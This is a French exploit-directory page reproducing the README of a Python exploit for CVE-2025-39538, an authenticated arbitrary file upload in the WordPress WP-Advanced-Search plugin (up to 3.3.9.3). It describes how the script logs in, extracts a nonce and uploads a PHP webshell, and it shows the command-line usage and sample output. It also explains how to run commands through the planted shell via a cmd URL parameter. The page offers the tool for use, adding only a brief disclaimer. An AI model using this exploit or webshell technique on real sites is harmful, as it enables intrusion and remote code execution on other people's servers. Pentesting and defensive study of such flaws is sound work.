Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnérabilité de téléchargement de fichier arbitraire | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-39538
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnérabilité de téléchargement de fichier arbitraire

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Téléchargement arbitraire de fichier

CVE-2025-39538
Publié : 2025-04-16
Type de vulnérabilité : Téléchargement arbitraire de fichier (Téléchargement sans restriction de fichier de type dangereux)
Plugin concerné : WP-Advanced-Search par Mathieu Chartier
Versions concernées : Toutes les versions jusqu'à 3.3.9.3 inclus

Cette vulnérabilité permet à un attaquant authentifié de télécharger un fichier PHP malveillant (tel qu'un webshell) sur le serveur en utilisant la fonctionnalité d'importation fournie par le plugin. Le fichier téléchargé est placé dans le répertoire des téléchargements de WordPress et pourrait conduire à une exécution de code à distance.

🧱 Chemin de téléchargement :

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ À propos du script d'exploitation

Ce script Python effectue les actions suivantes :

  1. Se connecte au site WordPress en utilisant les identifiants fournis.
  2. Extrait le wp_advanced_search_up_nonce requis depuis la page d'administration import/export.
  3. Télécharge un webshell (fichier PHP) via une requête POST conçue.

🚀 Utilisation

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ Exemple de sortie :

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).

🐚 Utilisation du shell téléchargé

Après le téléchargement, vous pouvez accéder à votre shell comme ceci :

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

Remplacez whoami par n'importe quelle commande Linux que vous souhaitez exécuter, par exemple :

  • id — affiche l'ID de l'utilisateur actuel.
  • pwd — affiche le répertoire actuel.
  • ls — liste les fichiers.

⚠️ Avertissement


Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script.


Par : Nxploited | Khaled Alenazi

Télécharger l’outil